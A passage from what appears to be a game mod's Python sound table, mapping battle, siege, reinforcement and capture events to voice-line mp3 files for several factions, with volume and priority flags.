["Mediterranean_Army_Settlement_Capture_Celebration_1.mp3","Mediterranean_Army_Settlement_Capture_Celebration_2.mp3","Mediterranean_Army_Settlement_Capture_Celebration_3.mp3","Mediterranean_General_Settlement_Capture_Celebration_1.mp3","Mediterranean_General_Settlement_Capture_Celebration_2.mp3","Mediterranean_General_Settlement_Capture_Celebration_3.mp3","Mediterranean_General_Settlement_Capture_Celebration_Chivalry_1.mp3","Mediterranean_General_Settlement_Capture_Celebration_Chivalry_2.mp3","Mediterranean_General_Settlement_Capture_Celebration_Chivalry_3.mp3","Mediterranean_General_Settlement_Capture_Celebration_Dread_1.mp3","Mediterranean_General_Settlement_Capture_Celebration_Dread_2.mp3","Mediterranean_General_Settlement_Capture_Celebration_Dread_3.mp3"]), ("medig_begin_siege", sf_2d|sf_priority_10|sf_vol_7, ["Mediterranean_Army_siege_Begun_1.mp3","Mediterranean_Army_siege_Begun_2.mp3","Mediterranean_General_siege_Begun_1.mp3","Mediterranean_General_siege_Begun_2.mp3","Mediterranean_General_siege_Begun_Chivalry_1.mp3","Mediterranean_General_siege_Begun_Chivalry_2.mp3","Mediterranean_General_siege_Begun_Dread_1.mp3","Mediterranean_General_siege_Begun_Dread_2.mp3"]), ("medig_besieged", sf_2d|sf_priority_10|sf_vol_7, ["Mediterranean_Army_siege_Besieged_1.mp3","Mediterranean_Army_siege_Besieged_2.mp3","Mediterranean_Army_siege_Besieged_3.mp3","Mediterranean_General_siege_Besieged_1.mp3","Mediterranean_General_siege_Besieged_2.mp3","Mediterranean_General_siege_Besieged_3.mp3","Mediterranean_General_siege_Besieged_Chivalry_1.mp3","Mediterranean_General_siege_Besieged_Chivalry_2.mp3","Mediterranean_General_siege_Besieged_Chivalry_3.mp3","Mediterranean_General_siege_Besieged_Dread_1.mp3","Mediterranean_General_siege_Besieged_Dread_2.mp3","Mediterranean_General_siege_Besieged_Dread_3.mp3"]), ("medig_siege_ongoing", sf_2d|sf_priority_10|sf_vol_7, ["Mediterranean_Army_siege_Ongoing_1.mp3","Mediterranean_Army_siege_Ongoing_2.mp3","Mediterranean_Army_siege_Ongoing_3.mp3","Mediterranean_General_siege_Ongoing_1.mp3","Mediterranean_General_siege_Ongoing_2.mp3","Mediterranean_General_siege_Ongoing_3.mp3","Mediterranean_General_siege_Ongoing_Chivalry_1.mp3","Mediterranean_General_siege_Ongoing_Chivalry_2.mp3","Mediterranean_General_siege_Ongoing_Chivalry_3.mp3","Mediterranean_General_siege_Ongoing_Dread_1.mp3","Mediterranean_General_siege_Ongoing_Dread_2.mp3","Mediterranean_General_siege_Ongoing_Dread_3.mp3"]), #Mediterranen #Islamics ("arabicg_admiral_attacked", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_Admiral_Attacked_Enemy_1.mp3","Arabic_Admiral_Attacked_Enemy_3.mp3"]), ("arabicg_admiral_attacking", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_Admiral_Attacking_1.mp3","Arabic_Admiral_Attacking_2.mp3"]), ("arabicg_army_attack", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_Army_Attacking_1.mp3","Arabic_Army_Attacking_2.mp3","Arabic_Army_Attacking_3.mp3","Arabic_Army_Fight_On_Battle_Map_1.mp3","Arabic_Army_Fight_On_Battle_Map_2.mp3","Arabic_Army_Fight_On_Battle_Map_3.mp3","Arabic_Army_Fight_On_Battle_Map_4.mp3","Arabic_Army_Fight_On_Battle_Map_5.mp3","Arabic_Army_Fight_On_Battle_Map_6.mp3","Arabic_General_Attacking_2.mp3","Arabic_General_Attacking_3.mp3","Arabic_General_Attacking_Chivalry_1.mp3","Arabic_General_Attacking_Chivalry_3.mp3","Arabic_General_Attacking_Dread_1.mp3","Arabic_General_Attacking_Dread_2.mp3","Arabic_General_Fight_On_Battle_Map_1.mp3","Arabic_General_Fight_On_Battle_Map_2.mp3","Arabic_General_Fight_On_Battle_Map_3.mp3","Arabic_General_Fight_On_Battle_Map_Chivalry_1.mp3","Arabic_General_Fight_On_Battle_Map_Chivalry_2.mp3","Arabic_General_Fight_On_Battle_Map_Chivalry_3.mp3","Arabic_General_Fight_On_Battle_Map_3.mp3","Arabic_General_Fight_On_Battle_Map_Dread_1.mp3","Arabic_General_Fight_On_Battle_Map_Dread_2.mp3","Arabic_General_Fight_On_Battle_Map_Dread_3.mp3"]), ("arabicg_army_retreat", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_Army_Battle_lost_retreat_1.mp3","Arabic_Army_Battle_lost_retreat_2.mp3","Arabic_Army_Battle_lost_retreat_3.mp3","Arabic_General_Battle_lost_retreat_1.mp3","Arabic_General_Battle_lost_retreat_2.mp3","Arabic_General_Battle_lost_retreat_3.mp3","Arabic_General_Battle_lost_retreat_Chivalry_1.mp3","Arabic_General_Battle_lost_retreat_Chivalry_2.mp3","Arabic_General_Battle_lost_retreat_Chivalry_3.mp3","Arabic_General_Battle_lost_retreat_Dread_1.mp3","Arabic_General_Battle_lost_retreat_Dread_2.mp3","Arabic_General_Battle_lost_retreat_Dread_3.mp3"]), ("arabicg_army_bwon", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_Army_Battle_won_1.mp3","Arabic_Army_Battle_won_2.mp3","Arabic_General_Battle_won_1.mp3","Arabic_General_Battle_won_2.mp3","Arabic_General_Battle_won_3.mp3","Arabic_General_Battle_won_Chivalry_1.mp3","Arabic_General_Battle_won_Chivalry_2.mp3","Arabic_General_Battle_won_Chivalry_3.mp3","Arabic_General_Battle_won_Dread_2.mp3"]), ("arabicg_army_join", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_Army_Joins_Army_1.mp3","Arabic_Army_Joins_Army_2.mp3","Arabic_General_Joins_Army_1.mp3","Arabic_General_Joins_Army_2.mp3","Arabic_General_Joins_Army_Chivalry_2.mp3","Arabic_General_Joins_Army_Chivalry_3.mp3","Arabic_General_Joins_Army_Dread_2.mp3"]), ("arabicg_army_leave", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_Army_Leaves_Army_1.mp3","Arabic_Army_Leaves_Army_2.mp3","Arabic_General_Leaves_Army_1.mp3","Arabic_General_Leaves_Army_2.mp3","Arabic_General_Leaves_Army_Dread_1.mp3","Arabic_General_Leaves_Army_Dread_3.mp3"]), ("arabicg_capture", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_Army_Settlement_Capture_Celebration_2.mp3","Arabic_Army_Settlement_Capture_Celebration_3.mp3","Arabic_General_Settlement_Capture_Celebration_2.mp3","Arabic_General_Settlement_Capture_Celebration_3.mp3","Arabic_General_Settlement_Capture_Celebration_Chivalry_1.mp3","Arabic_General_Settlement_Capture_Celebration_Chivalry_2.mp3","Arabic_General_Settlement_Capture_Celebration_Chivalry_3.mp3","Arabic_General_Settlement_Capture_Celebration_Dread_3.mp3"]), ("arabicg_begin_siege", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_Army_siege_Begun_2.mp3","Arabic_General_siege_Begun_2.mp3","Arabic_General_siege_Begun_Chivalry_1.mp3","Arabic_General_siege_Begun_Chivalry_2.mp3"]), ("arabicg_besieged", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_Army_siege_Ongoing_1.mp3","Arabic_General_siege_Besieged_Chivalry_1.mp3","Arabic_General_siege_Besieged_Chivalry_2.mp3","Arabic_General_siege_Besieged_Dread_1.mp3","Arabic_General_siege_Besieged_Dread_2.mp3"]), ("arabicg_siege_ongoing", sf_2d|sf_priority_10|sf_vol_7, ["Arabic_General_siege_Ongoing_1.mp3"]), #Islamics #German ("germang_admiral_attacked", sf_2d|sf_priority_10|sf_vol_7, ["German_Admiral_Attacked_Enemy_2.mp3"]), ("germang_admiral_attacking", sf_2d|sf_priority_10|sf_vol_7, ["German_Admiral_Attacking_2.mp3"]), ("germang_army_attack", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Attacking_2.mp3","German_Army_Fight_On_Battle_Map_1.mp3","German_Army_Fight_On_Battle_Map_2.mp3","German_Army_Fight_On_Battle_Map_3.mp3","German_Army_Fight_On_Battle_Map_4.mp3","German_Army_Fight_On_Battle_Map_5.mp3","German_General_Attacking_2.mp3","German_General_Attacking_Chivalry_2.mp3","German_General_Attacking_Dread_1.mp3","German_General_Fight_On_Battle_Map_1.mp3","German_General_Fight_On_Battle_Map_2.mp3","German_General_Fight_On_Battle_Map_3.mp3","German_General_Fight_On_Battle_Map_Chivalry_1.mp3","German_General_Fight_On_Battle_Map_Chivalry_2.mp3","German_General_Fight_On_Battle_Map_Chivalry_3.mp3","German_General_Fight_On_Battle_Map_Dread_1.mp3","German_General_Fight_On_Battle_Map_Dread_2.mp3","German_General_Fight_On_Battle_Map_Dread_3.mp3"]), ("germang_army_retreat", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Battle_lost_retreat_1.mp3","German_Army_Battle_lost_retreat_2.mp3","German_Army_Battle_lost_retreat_3.mp3","German_General_Battle_lost_retreat_1.mp3","German_General_Battle_lost_retreat_2.mp3","German_General_Battle_lost_retreat_3.mp3","German_General_Battle_lost_retreat_Chivalry_1.mp3","German_General_Battle_lost_retreat_Chivalry_2.mp3","German_General_Battle_lost_retreat_Chivalry_3.mp3","German_General_Battle_lost_retreat_Dread_1.mp3","German_General_Battle_lost_retreat_Dread_2.mp3","German_General_Battle_lost_retreat_Dread_3.mp3"]), ("germang_army_bwon", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Battle_won_2.mp3","German_Army_Battle_won_3.mp3","German_General_Battle_won_2.mp3","German_General_Battle_won_3.mp3","German_General_Battle_won_Chivalry_2.mp3","German_General_Battle_won_Chivalry_3.mp3","German_General_Battle_won_Dread_1.mp3","German_General_Battle_won_Dread_3.mp3"]), ("germang_army_join", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Joins_Army_2.mp3","German_General_Joins_Army_2.mp3","German_General_Joins_Army_Dread_2.mp3"]), ("germang_army_leave", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Leaves_Army_3.mp3","German_General_Leaves_Army_3.mp3","German_General_Leaves_Army_Chivalry_1.mp3","German_General_Leaves_Army_Dread_2.mp3","German_General_Leaves_Army_Dread_3.mp3"]), ("germang_capture", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Settlement_Capture_Celebration_1.mp3","German_Army_Settlement_Capture_Celebration_3.mp3","German_General_Settlement_Capture_Celebration_Chivalry_1.mp3","German_General_Settlement_Capture_Celebration_Chivalry_3.mp3","German_General_Settlement_Capture_Celebration_Dread_1.mp3","German_General_Settlement_Capture_Celebration_Dread_2.mp3"]), ("germang_begin_siege", sf_2d|sf_priority_10|sf_vol_7, ["German_General_siege_Begun_Dread_1.mp3","German_General_siege_Begun_Dread_2.mp3"]), ("germang_besieged", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_siege_Besieged_3.mp3","German_General_siege_Besieged_3.mp3","German_General_siege_Besieged_Chivalry_1.mp3","German_General_siege_Besieged_Chivalry_2.mp3","German_General_siege_Besieged_Dread_1.mp3","German_General_siege_Besieged_Dread_3.mp3"]), ("germang_siege_ongoing", sf_2d|sf_priority_10|sf_vol_7, ["German_General_siege_Ongoing_Dread_2.mp3","German_General_siege_Ongoing_Dread_3.mp3"]), #German #English ("engg_admiral_attacked", sf_2d|sf_priority_10|sf_vol_7, ["English_Admiral_Attacked_Enemy_1.mp3","English_Admiral_Attacked_Enemy_2.mp3","English_Admiral_Attacked_Enemy_3.mp3"]), ("engg_admiral_attacking", sf_2d|sf_priority_10|sf_vol_7, ["English_Admiral_Attacking_1.mp3","English_Admiral_Attacking_2.mp3","English_Admiral_Attacking_3.mp3"]), ("engg_army_attack", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_Attacking_1.mp3","English_Army_Attacking_2.mp3","English_Army_Attacking_3.mp3","English_Army_Fight_On_Battle_Map_1.mp3","English_Army_Fight_On_Battle_Map_2.mp3","English_Army_Fight_On_Battle_Map_3.mp3","English_Army_Fight_On_Battle_Map_4.mp3","English_Army_Fight_On_Battle_Map_5.mp3","English_General_Attacking_1.mp3","English_General_Attacking_2.mp3","English_General_Attacking_3.mp3","English_General_Attacking_Chivalry_1.mp3","English_General_Attacking_Chivalry_3.mp3","English_General_Attacking_Dread_1.mp3","English_General_Attacking_Dread_2.mp3","English_General_Attacking_Dread_3.mp3"]), ("engg_army_retreat", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_Battle_lost_retreat_1.mp3","English_Army_Battle_lost_retreat_2.mp3","English_Army_Battle_lost_retreat_3.mp3","English_General_Battle_lost_retreat_1.mp3","English_General_Battle_lost_retreat_2.mp3","English_General_Battle_lost_retreat_3.mp3","English_General_Battle_lost_retreat_Chivalry_1.mp3","English_General_Battle_lost_retreat_Chivalry_2.mp3","English_General_Battle_lost_retreat_Chivalry_3.mp3","English_General_Battle_lost_retreat_Dread_1.mp3","English_General_Battle_lost_retreat_Dread_2.mp3","English_General_Battle_lost_retreat_Dread_3.mp3","English_General_Fight_On_Battle_Map_1.mp3","English_General_Fight_On_Battle_Map_2.mp3","English_General_Fight_On_Battle_Map_3.mp3","English_General_Fight_On_Battle_Map_Chivalry_1.mp3","English_General_Fight_On_Battle_Map_Chivalry_3.mp3","English_General_Fight_On_Battle_Map_Dread_1.mp3","English_General_Fight_On_Battle_Map_Dread_2.mp3","English_General_Fight_On_Battle_Map_Dread_3.mp3"]), ("engg_army_bwon", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_Battle_won_1.mp3","English_Army_Battle_won_2.mp3","English_Army_Battle_won_3.mp3","English_General_Battle_won_1.mp3","English_General_Battle_won_2.mp3","English_General_Battle_won_3.mp3","English_General_Battle_won_Chivalry_1.mp3","English_General_Battle_won_Chivalry_2.mp3","English_General_Battle_won_Chivalry_3.mp3","English_General_Battle_won_Dread_1.mp3","English_General_Battle_won_Dread_2.mp3","English_General_Battle_won_Dread_3.mp3"]), ("engg_army_join", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_Joins_Army_1.mp3","English_Army_Joins_Army_2.mp3","English_Army_Joins_Army_3.mp3","English_General_Joins_Army_1.mp3","English_General_Joins_Army_2.mp3","English_General_Joins_Army_3.mp3","English_General_Joins_Army_Chivalry_1.mp3","English_General_Joins_Army_Chivalry_2.mp3","English_General_Joins_Army_Chivalry_3.mp3","English_General_Joins_Army_Dread_1.mp3","English_General_Joins_Army_Dread_2.mp3","English_General_Joins_Army_Dread_3.mp3"]), ("engg_army_leave", sf_2d|sf_priority_10|sf_vol_7, ["English_General_Leaves_Army_1.mp3","English_General_Leaves_Army_2.mp3","English_General_Leaves_Army_3.mp3","English_General_Leaves_Army_Chivalry_1.mp3","English_General_Leaves_Army_Chivalry_2.mp3","English_General_Leaves_Army_Chivalry_3.mp3","English_General_Leaves_Army_Dread_1.mp3","English_General_Leaves_Army_Dread_2.mp3","English_General_Leaves_Army_Dread_3.mp3",]), ("engg_capture", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_Settlement_Capture_Celebration_1.mp3","English_Army_Settlement_Capture_Celebration_3.mp3","English_General_Settlement_Capture_Celebration_1.mp3","English_General_Settlement_Capture_Celebration_2.mp3","English_General_Settlement_Capture_Celebration_3.mp3","English_General_Settlement_Capture_Celebration_Chivalry_1.mp3","English_General_Settlement_Capture_Celebration_Chivalry_2.mp3","English_General_Settlement_Capture_Celebration_Chivalry_3.mp3","English_General_Settlement_Capture_Celebration_Dread_1.mp3","English_General_Settlement_Capture_Celebration_Dread_2.mp3","English_General_Settlement_Capture_Celebration_Dread_3.mp3"]), ("engg_begin_siege", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_siege_Begun_1.mp3","English_Army_siege_Begun_2.mp3","English_General_siege_Begun_1.mp3","English_General_siege_Begun_2.mp3","English_General_siege_Begun_Chivalry_1.mp3","English_General_siege_Begun_Chivalry_2.mp3","English_General_siege_Begun_Dread_1.mp3","English_General_siege_Begun_Dread_2.mp3"]), ("engg_besieged", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_siege_Besieged_1.mp3","English_Army_siege_Besieged_2.mp3","English_Army_siege_Besieged_3.mp3","English_General_siege_Besieged_1.mp3","English_General_siege_Besieged_2.mp3","English_General_siege_Besieged_3.mp3","English_General_siege_Besieged_Chivalry_1.mp3","English_General_siege_Besieged_Chivalry_2.mp3","English_General_siege_Besieged_Chivalry_3.mp3","English_General_siege_Besieged_Dread_1.mp3","English_General_siege_Besieged_Dread_2.mp3","English_General_siege_Besieged_Dread_3.mp3"]), ("engg_siege_ongoing", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_siege_Ongoing_1.mp3","English_Army_siege_Ongoing_2.mp3","English_Army_siege_Ongoing_3.mp3","English_General_siege_Ongoing_1.mp3","English_General_siege_Ongoing_2.mp3","English_General_siege_Ongoing_3.mp3","English_General_siege_Ongoing_Chivalry_1.mp3","English_General_siege_Ongoing_Chivalry_2.mp3","English_General_siege_Ongoing_Chivalry_3.mp3","English_General_siege_Ongoing_Dread_1.mp3","English_General_siege_Ongoing_Dread_2.mp3","English_General_siege_Ongoing_Dread_3.mp3"]), #English #Easteuro ("eastern_admiral_attacked", sf_2d|sf_priority_10|sf_vol_7, ["East_European_Admiral_Attacked_Enemy_1.mp3", "East_European_Admiral_Attacked_Enemy_2.mp3", "East_European_Admiral_Attacked_Enemy_3.mp3"]), ("eastern_admiral_attacking", sf_2d|sf_priority_10|sf_vol_7, ["East_European_Admiral_Attacking_1.mp3", "East_European_Admiral_Attacking_2.mp3", "East_European_Admiral_Attacking_3.mp3"]), ("eastern_army_attacking", sf_2d|sf_priority_10|sf_vol_7, ["East_European_Army_Attacking_1.mp3", "East_European_Army_Attacking_2.mp3", "East_European_Army_Attacking_3.mp3", "East_European_Army_Fight_On_Battle_Map_1.mp3", "East_European_Army_Fight_On_Battle_Map_2.mp3", "East_European_Army_Fight_On_Battle_Map_3.mp3", "East_European_Army_Fight_On_Battle_Map_4.mp3", "East_European_Army_Fight_On_Battle_Map_5.mp3", "East_European_Army_Fight_On_Battle_Map_6.mp3", "East_European_General_Attacking_1.mp3", "East_European_General_Attacking_3.mp3", "East_European_General_Attacking_Chivalry_1.mp3", "East_European_General_Attacking_Chivalry_2.mp3", "East_European_General_Attacking_Chivalry_3.mp3", "East_European_General_Attacking_Dread_1.mp3", "East_European_General_Attacking_Dread_2.mp3", "East_European_General_Attacking_Dread_3.mp3", "East_European_General_Fight_On_Battle_Map_1.mp3", "East_European_General_Fight_On_Battle_Map_2.mp3", "East_European_General_Fight_On_Battle_Map_3.mp3", "East_European_General_Fight_On_Battle_Map_Chivalry_1.mp3", "East_European_General_Fight_On_Battle_Map_Chivalry_2.mp3", "East_European_General_Fight_On_Battle_Map_Chivalry_3.mp3", "East_European_General_Fight_On_Battle_Map_Dread_1.mp3", "East_European_General_Fight_On_Battle_Map_Dread_2.mp3", "East_European_General_Fight_On_Battle_Map_Dread_3.mp3"]), ("eastern_army_retreat", sf_2d|sf_priority_10|sf_vol_7, ["East_European_Army_Battle_lost_retreat_1.mp3", "East_European_Army_Battle_lost_retreat_3.mp3", "East_European_General_Battle_lost_retreat_1.mp3", "East_European_General_Battle_lost_retreat_3.mp3", "East_European_General_Battle_lost_retreat_Chivalry_1.mp3", "East_European_General_Battle_lost_retreat_Chivalry_2.mp3", "East_European_General_Battle_lost_retreat_Chivalry_3.mp3", "East_European_General_Battle_lost_retreat_Dread_1.mp3", "East_European_General_Battle_lost_retreat_Dread_2.mp3", "East_European_General_Battle_lost_retreat_Dread_3.mp3"]), ("eastern_army_bwon", sf_2d|sf_priority_10|sf_vol_7, ["East_European_Army_Battle_won_1.mp3", "East_European_Army_Battle_won_2.mp3", "East_European_Army_Battle_won_3.mp3", "East_European_General_Battle_won_1.mp3", "East_European_General_Battle_won_2.mp3", "East_European_General_Battle_won_3.mp3", "East_European_General_Battle_won_Chivalry_1.mp3", "East_European_General_Battle_won_Chivalry_2.mp3", "East_European_General_Battle_won_Chivalry_3.mp3", "East_European_General_Battle_won_Dread_1.mp3", "East_European_General_Battle_won_Dread_3.mp3"]), ("eastern_army_join", sf_2d|sf_priority_10|sf_vol_7, ["East_European_Army_Joins_Army_1.mp3", "East_European_Army_Joins_Army_2.mp3", "East_European_Army_Joins_Army_3.mp3", "East_European_General_Joins_Army_1.mp3", "East_European_General_Joins_Army_2.mp3", "East_European_General_Joins_Army_3.mp3", "East_European_General_Joins_Army_Dread_1.mp3", "East_European_General_Joins_Army_Dread_2.mp3"]), ("eastern_army_leave", sf_2d|sf_priority_10|sf_vol_7, ["East_European_Army_Leaves_Army_1.mp3", "East_European_Army_Leaves_Army_3.mp3", "East_European_General_Leaves_Army_1.mp3", "East_European_General_Leaves_Army_2.mp3", "East_European_General_Leaves_Army_3.mp3", "East_European_General_Leaves_Army_Dread_1.mp3", "East_European_General_Leaves_Army_Dread_3.mp3"]), ("eastern_capture", sf_2d|sf_priority_10|sf_vol_7, ["East_European_Army_Settlement_Capture_Celebration_1.mp3", "East_European_Army_Settlement_Capture_Celebration_2.mp3", "East_European_Army_Settlement_Capture_Celebration_3.mp3", "East_European_General_Settlement_Capture_Celebration_1.mp3", "East_European_General_Settlement_Capture_Celebration_2.mp3", "East_European_General_Settlement_Capture_Celebration_Chivalry_1.mp3", "East_European_General_Settlement_Capture_Celebration_Chivalry_2.mp3", "East_European_General_Settlement_Capture_Celebration_Chivalry_3.mp3", "East_European_General_Settlement_Capture_Celebration_Dread_1.mp3", "East_European_General_Settlement_Capture_Celebration_Dread_2.mp3",]), ("eastern_begin_siege", sf_2d|sf_priority_10|sf_vol_7, ["East_European_Army_siege_Begun_1.mp3", "East_European_General_siege_Begun_1.mp3", "East_European_General_siege_Begun_2.mp3", "East_European_General_siege_Begun_Dread_1.mp3", "East_European_General_siege_Begun_Dread_2.mp3" ]), ("eastern_besieged", sf_2d|sf_priority_10|sf_vol_7, [ "East_European_Army_siege_Besieged_2.mp3", "East_European_Army_siege_Besieged_3.mp3", "East_European_General_siege_Besieged_2.mp3", "East_European_General_siege_Besieged_3.mp3", "East_European_General_siege_Besieged_Chivalry_2.mp3", "East_European_General_siege_Besieged_Chivalry_3.mp3", "East_European_General_siege_Besieged_Dread_1.mp3", "East_European_General_siege_Besieged_Dread_2.mp3", "East_European_General_siege_Besieged_Dread_3.mp3"]), ("eastern_siege_ongoing", sf_2d|sf_priority_10|sf_vol_7, [ "East_European_Army_siege_Ongoing_2.mp3", "East_European_Army_siege_Ongoing_3.mp3", "East_European_General_siege_Ongoing_1.mp3", "East_European_General_siege_Ongoing_3.mp3", "East_European_General_siege_Ongoing_1.mp3", "East_European_General_siege_Ongoing_3.mp3", "East_European_General_siege_Ongoing_Chivalry_3.mp3", "East_European_General_siege_Ongoing_Dread_2.mp3"]), #Easteuro #French ("frenchg_admiral_attacked", sf_2d|sf_priority_10|sf_vol_7, ["French_Admiral_Attacked_Enemy_2.mp3","French_Admiral_Attacked_Enemy_3.mp3"]), ("frenchg_admiral_attacking", sf_2d|sf_priority_10|sf_vol_7, ["French_Admiral_Attacking_1.mp3","French_Admiral_Attacking_2.mp3"]), ("frenchg_army_attack", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_Attacking_2.mp3","French_Army_Fight_On_Battle_Map_3.mp3","French_Army_Fight_On_Battle_Map_5.mp3","French_General_Attacking_2.mp3","French_General_Attacking_3.mp3","French_General_Attacking_Chivalry_1.mp3","French_General_Attacking_Chivalry_2.mp3","French_General_Attacking_Dread_1.mp3","French_General_Attacking_Dread_3.mp3","French_General_Fight_On_Battle_Map_3.mp3","French_General_Fight_On_Battle_Map_Chivalry_1.mp3","French_General_Fight_On_Battle_Map_Dread_1.mp3","French_General_Fight_On_Battle_Map_Dread_2.mp3","French_General_Fight_On_Battle_Map_Dread_3.mp3"]), ("frenchg_army_retreat", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_Battle_lost_retreat_1.mp3","French_Army_Battle_lost_retreat_2.mp3","French_General_Battle_lost_retreat_1.mp3","French_General_Battle_lost_retreat_2.mp3","French_General_Battle_lost_retreat_Chivalry_1.mp3","French_General_Battle_lost_retreat_Chivalry_2.mp3","French_General_Battle_lost_retreat_Chivalry_3.mp3","French_General_Battle_lost_retreat_Dread_1.mp3","French_General_Battle_lost_retreat_Dread_2.mp3","French_General_Battle_lost_retreat_Dread_3.mp3"]), ("frenchg_army_bwon", sf_2d|sf_priority_10|sf_vol_7, ["French_General_Battle_won_3.mp3","French_General_Battle_won_Chivalry_1.mp3","French_General_Battle_won_Chivalry_3.mp3","French_General_Battle_won_Dread_1.mp3","French_General_Battle_won_Dread_2.mp3","French_General_Battle_won_Dread_3.mp3"]), ("frenchg_army_join", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_Joins_Army_1.mp3","French_Army_Joins_Army_2.mp3","French_Army_Joins_Army_3.mp3","French_General_Joins_Army_1.mp3","French_General_Joins_Army_3.mp3","French_General_Joins_Army_Chivalry_3.mp3","French_General_Joins_Army_Dread_1.mp3","French_General_Joins_Army_Dread_2.mp3","French_General_Joins_Army_Dread_3.mp3"]), ("frenchg_army_leave", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_Leaves_Army_1.mp3","French_Army_Leaves_Army_2.mp3","French_General_Leaves_Army_1.mp3","French_General_Leaves_Army_2.mp3","French_General_Leaves_Army_3.mp3","French_General_Leaves_Army_Chivalry_1.mp3","French_General_Leaves_Army_Chivalry_2.mp3","French_General_Leaves_Army_Dread_1.mp3","French_General_Leaves_Army_Dread_2.mp3", "French_General_Leaves_Army_Dread_3.mp3"]), ("frenchg_capture", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_Settlement_Capture_Celebration_3.mp3","French_General_Settlement_Capture_Celebration_3.mp3","French_General_Settlement_Capture_Celebration_Dread_1.mp3","French_General_Settlement_Capture_Celebration_Dread_3.mp3"]), ("frenchg_begin_siege", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_siege_Begun_2.mp3","French_General_siege_Begun_1.mp3","French_General_siege_Begun_2.mp3","French_General_siege_Begun_Dread_2.mp3"]), ("frenchg_besieged", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_siege_Besieged_1.mp3","French_Army_siege_Besieged_2.mp3","French_General_siege_Besieged_1.mp3","French_General_siege_Besieged_2.mp3","French_General_siege_Besieged_Chivalry_1.mp3","French_General_siege_Besieged_Dread_1.mp3","French_General_siege_Besieged_Dread_2.mp3","French_General_siege_Besieged_Dread_3.mp3"]), ("frenchg_siege_ongoing", sf_2d|sf_priority_10|sf_vol_7, ["French_Army_siege_Ongoing_1.mp3","French_Army_siege_Ongoing_3.mp3","French_General_siege_Ongoing_1.mp3","French_General_siege_Ongoing_2.mp3","French_General_siege_Ongoing_Chivalry_3.mp3","French_General_siege_Ongoing_Dread_2.mp3","French_General_siege_Ongoing_Dread_3.mp3"]), #French #Reinforcements ("fac_reinforce_eastern_enemy", sf_2d|sf_priority_10|sf_vol_8, ["East_European_Enemy_Reinforcements_Arrive_1.mp3","East_European_Enemy_Reinforcements_Arrive_2.mp3"]), ("fac_reinforce_mongol_enemy", sf_2d|sf_priority_10|sf_vol_8, ["Mongolian_Enemy_Reinforcements_Arrive_1.mp3","Mongolian_Enemy_Reinforcements_Arrive_2.mp3"]), ("fac_reinforce_scotland_enemy", sf_2d|sf_priority_10|sf_vol_8, ["Scottish_Enemy_Reinforcements_Arrive_1.mp3","Scottish_Enemy_Reinforcements_Arrive_2.mp3"]), ("fac_reinforce_medi_enemy", sf_2d|sf_priority_10|sf_vol_8, ["Mediterranean_Enemy_Reinforcements_Arrive_1.mp3","Mediterranean_Enemy_Reinforcements_Arrive_2.mp3"]), ("fac_reinforce_islam_enemy", sf_2d|sf_priority_10|sf_vol_8, ["Arabic_Enemy_Reinforcements_Arrive_1.mp3","Arabic_Enemy_Reinforcements_Arrive_2.mp3"]), ("fac_reinforce_german_enemy", sf_2d|sf_priority_10|sf_vol_8, ["German_Enemy_Reinforcements_Arrive_1.mp3","German_Enemy_Reinforcements_Arrive_2.mp3"]), ("fac_reinforce_eng_enemy", sf_2d|sf_priority_10|sf_vol_8, ["English_Enemy_Reinforcements_Arrive_1.mp3","English_Enemy_Reinforcements_Arrive_2.mp3"]), ("fac_reinforce_french_enemy", sf_2d|sf_priority_10|sf_vol_8, ["French_Enemy_Reinforcements_Arrive_1.mp3","French_Enemy_Reinforcements_Arrive_2.mp3"]), ("fac_reinforce_ally", sf_2d|sf_priority_10|sf_vol_8, ["reinforcements_arrived.mp3"]), # ##Ladders #("eastern_ladder", sf_2d|sf_priority_10|sf_vol_8, ["East_European_Light_Generic_Ladder_2.mp3","East_European_Light_Generic_Ladder_1.mp3", "East_European_Heavy_Generic_Ladder_2.mp3","East_European_Heavy_Generic_Ladder_1.mp3", "East_European_General_Generic_Ladder_2.mp3","East_European_General_Generic_Ladder_1.mp3"]), #("mongol_ladder", sf_2d|sf_priority_10|sf_vol_8, ["Mongolian_Light_Generic_Ladder_2.mp3","Mongolian_Light_Generic_Ladder_1.mp3", "Mongolian_Heavy_Generic_Ladder_2.mp3","Mongolian_Heavy_Generic_Ladder_1.mp3", "Mongolian_General_Generic_Ladder_2.mp3","Mongolian_General_Generic_Ladder_1.mp3"]), #("scotland_ladder", sf_2d|sf_priority_10|sf_vol_8, ["Scottish_Light_Generic_Ladder_2.mp3","Scottish_Light_Generic_Ladder_1.mp3", "Scottish_Heavy_Generic_Ladder_2.mp3","Scottish_Heavy_Generic_Ladder_1.mp3", "Scottish_General_Generic_Ladder_2.mp3","Scottish_General_Generic_Ladder_1.mp3"]), #("medi_ladder", sf_2d|sf_priority_10|sf_vol_8, ["Mediterranean_Light_Generic_Ladder_2.mp3","Mediterranean_Light_Generic_Ladder_1.mp3", 